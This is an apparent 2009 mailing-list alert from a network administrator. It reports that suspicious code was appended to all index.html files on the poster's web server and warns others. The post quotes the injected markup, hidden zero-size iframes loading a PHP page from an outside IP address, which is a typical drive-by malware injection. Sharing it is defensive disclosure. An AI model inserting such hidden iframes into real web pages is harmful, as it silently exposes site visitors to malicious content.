17 Apr
2009
17 Apr
'09
4:39 p.m.
We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe> </body> </html> IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications berg@wins.net 715-832-3726